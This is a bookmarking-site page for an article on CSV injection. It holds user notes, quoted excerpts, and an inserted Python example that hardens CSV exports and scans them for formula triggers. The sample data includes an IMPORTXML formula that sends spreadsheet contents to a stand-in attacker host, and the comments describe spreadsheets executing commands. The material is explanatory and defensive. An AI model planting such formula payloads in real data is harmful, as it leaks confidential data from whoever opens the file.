The Absurdly Underestimated Dangers of CSV Injection


109 bookmarks. First posted by fileformat 6 days ago.


The Absurdly Underestimated Dangers of CSV Injection
security  attackvector  csv  dataInjectionAttack  vector  attack 
1 hour ago by psychemedia
In fact - in Excel at least - any of the symbols = , - , + , or @ will trigger this behavior causing lots of fun times for administrators whose data just doesn’t seem to format correctly (this is actually what brought my attention first to the issue). And just like that, the attacker has free rein to download a keylogger, install things, and overall remotely execute code not merely on any other person’s computer, but on that of someone guaranteed to have access to all users’ data; for example a manager or a company administrator. The attacker starts the cell with their trusty = symbol prefix and then points IMPORTXML to a server they control, appending spreadsheet data as a querystring. That information isn’t usually considered secret; it appears in the spreadsheet urls, and will often be accidentally emailed, or posted in intra-company documentation, relying on Google’s security to ensure only authorized users access that data. That way, if a researcher working on a secret warrant is to view their communication in a spreadsheet, a beacon goes out and the criminal has a canary effectively tipping them off that someone is snooping.
2 days ago by sechilds
Any cell that starts with an = is treated as a formula.
You can then execute any formula function.
security  excel  google  csv  injection 
3 days ago by drmeme
This isn't frightening at all because CSV exports from XLS don't run the world or anything.
from twitter
4 days ago by genehack
This isn't frightening at all because CSV exports from XLS don't run the world or anything.
from twitter_favs
4 days ago by nowthis
In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. It is an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.
csv  excel  google  security 
4 days ago by ssorc
info leak and code exec
csv  injection  google  excel  command 
5 days ago by plaxx
I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. It is an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.
excel  security  google 
5 days ago by danesparza
You can include an arbitrary formula, VBA script, or even shell command in a CSV file and MS Excel will execute it at load time with the current user's privileges. Oy.

You can't do this with Google Sheets, but you *can* send all the data in the spreadsheet, and any others that user can reach, to some x-random URI. This is not much nicer.
security  excel  csv  shellinjection 
5 days ago by yorksranter
The Absurdly Underestimated Dangers of CSV Injection
from twitter_favs
5 days ago by reinhard_codes
CSV can be really dangerous.
CSV  attack  hacking 
5 days ago by traggett
I thought by now I'd be too jaded to find anything about spreadsheets shocking, but then I read this.
from twitter_favs
5 days ago by cpsievert
Dang.
s 
5 days ago by jgordon
You can launch the calculator and everything else with a CSV file? Oh. Ouch.
from twitter
6 days ago by svensonsan
Interesting explanation of "an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV."
security 
6 days ago by shiflett
RT : Well this seems interesting in a bad way
h/t to and his 4 short links
from twitter_favs
6 days ago by gnat
I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news ( Edit: Credit where due, I’ve…
from instapaper
6 days ago by nielsk
RT : The Absurdly Underestimated Dangers of CSV Injection
from twitter
6 days ago by kejadlen
CSV is safe, right? Wrong...
6 days ago by NeoNacho
…an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.

That is just about every application.
csv  excel  google  security 
6 days ago by dagh
2017-10-07, by George Mauer,

"(...) Even though that cell was quoted it seems to have been interpreted as a formula just because the first character was an = symbol. In fact - in Excel at least - any of the symbols =, -, +, or @ will trigger this behavior (...)"

"(...) Well hold on, a formula is code that executes. So a user can cause code - even if its only formula code - to execute on an administrator’s machine in their user’s security context. (...)"

"(...) This formula is running in the administrator’s browser under their user account and security context. And this is Google Sheets - Sheets are not limited to just their own data, in fact they can pull in data from other spreadsheets that the user has access to. All that an attacker has to know is the other sheet’s id. That information isn’t usually considered secret; it appears in the spreadsheet urls, and will often be accidentally emailed, or posted in intra-company documentation, relying on Google’s security to ensure only authorized users access that data.

So hey, it’s not just your issue/time sheet/whatever data that’s getting exfiltrated. Keep client lists or wage info in a separate spreadsheet that your admin has access to? That info might be getting sucked up as well! All silently, and without anyone knowing anything about it. Yikes! (...)"

"(...) Well it’s not the CSV format’s. The format itself couldn’t be more clear that automatically executing anything that “looks like a formula” is not an intended usage. The bug therefore lies in popular Spreadsheet programs for doing the exact wrong thing. Of course Google Sheets must maintain feature parity with Excel, and Excel must support millions of complex spreadsheets already in existence. Also - I’m not going to research this but - even odds that Excel behavior came from something ancient like Lotus Notes. Getting all spreadsheet programs to change this behavior at this point is a pretty big mountain to conquer. I suppose that it’s everyone else that must change. (...)"
csv  security  google  excel  spreadsheets 
6 days ago by eric.brechemier
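An added example, not from the article or from any of the bookmarkers above, covering both sechilds' point that any cell starting with = is treated as a formula and the excerpts quoted here (the = - + @ triggers, the quoted-but-still-evaluated cell, the IMPORTXML beacon, and the conclusion that exporting applications are the ones that must change). It shows a small CSV exporter that neutralizes formula triggers on the way out, next to a scanner that flags cells a spreadsheet would evaluate. The rows, the attacker.example host and the IMPORTXML payload are constructed for illustration; treating tab and carriage return as extra triggers follows common CSV-injection guidance rather than anything the article states.

```python
import csv
import io
import re

# Leading characters that Excel / Google Sheets take as the start of a formula.
# = - + @ come from the article; tab and CR are added here as an assumption
# taken from common CSV-injection guidance.
FORMULA_TRIGGERS = ("=", "-", "+", "@", "\t", "\r")

# Plain decimal numbers ("-5", "+3.5", "1e3") are shown as numbers, not evaluated
# as formulas, so they are exempt from neutralization (design choice, see note).
_PLAIN_NUMBER = re.compile(r"^[+-]?\d+(\.\d+)?([eE][+-]?\d+)?$")


def is_formula_like(cell: str) -> bool:
    """True if a spreadsheet would evaluate this cell rather than display it."""
    return cell.startswith(FORMULA_TRIGGERS) and not _PLAIN_NUMBER.match(cell)


def neutralize(cell):
    """Return a value the spreadsheet will render as literal text.

    A leading single quote tells Excel and Sheets to treat the cell as text.
    CSV double-quoting alone does not help: the article notes the injected
    cell was quoted and still evaluated. Non-string values (ints, floats from
    the database) are emitted as-is, since they are not attacker-controlled text.
    """
    if not isinstance(cell, str):
        return cell
    if is_formula_like(cell):
        return "'" + cell
    return cell


def export_csv(rows, harden: bool = True) -> str:
    """Serialize rows to CSV; harden=False reproduces the vulnerable export."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize(c) for c in row] if harden else row)
    return buf.getvalue()


def scan_csv(text: str):
    """Return (row, column, cell) for every cell that would run as a formula."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample: a bug tracker whose "title" field is user-supplied and
# which an administrator later bulk-exports to CSV. Row 2 is the hypothetical
# exfiltration beacon from the article (IMPORTXML pointed at an attacker host,
# with sheet data appended as a querystring); rows 3 and 4 show other triggers.
SAMPLE_ROWS = [
    ["id", "reporter", "title"],
    [1, "alice", "Login page times out"],
    [2, "mallory", '=IMPORTXML("https://attacker.example/?d="&A2,"//a")'],
    [3, "mallory", "@SUM(1,2)"],
    [4, "bob", "-5 is not a valid quantity"],
    [5, "carol", "-5"],
]


if __name__ == "__main__":
    vulnerable = export_csv(SAMPLE_ROWS, harden=False)
    print("cells a spreadsheet would evaluate in the naive export:")
    for r, c, cell in scan_csv(vulnerable):
        print(f"  row {r} col {c}: {cell!r}")
    print("findings after hardening:", scan_csv(export_csv(SAMPLE_ROWS)))
```

The numeric exemption is a deliberate trade-off: without it every negative number exported as a string would gain a stray quote. The remaining caveat is that the single quote is only invisible inside a spreadsheet; any other consumer of the CSV will see it as data, so an application that also feeds the file to non-spreadsheet tooling may prefer to reject formula-like input at submission time instead.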
Interesting writeup on injecting formulas into CSV data to affect the behavior of the software that is reading the CSV. This example uses the preference that spreadsheets have to interpret formulas embedded in CSV files. Security risks like this can be surprising, even to very technical people, since the data isn't an executable itself.
6 days ago by thingles
RT : Oh, that is new to me. Scary!
from twitter
6 days ago by pulsar
For and other folk:
CSV Injection risks
from twitter
6 days ago by iand
Title exaggerates, but legit security issue: a CSV with a formula in a cell will get that cell to be executed by whoever opens the spreadsheet (Excel gives a warning).
security  via:reddit 
6 days ago by mcherm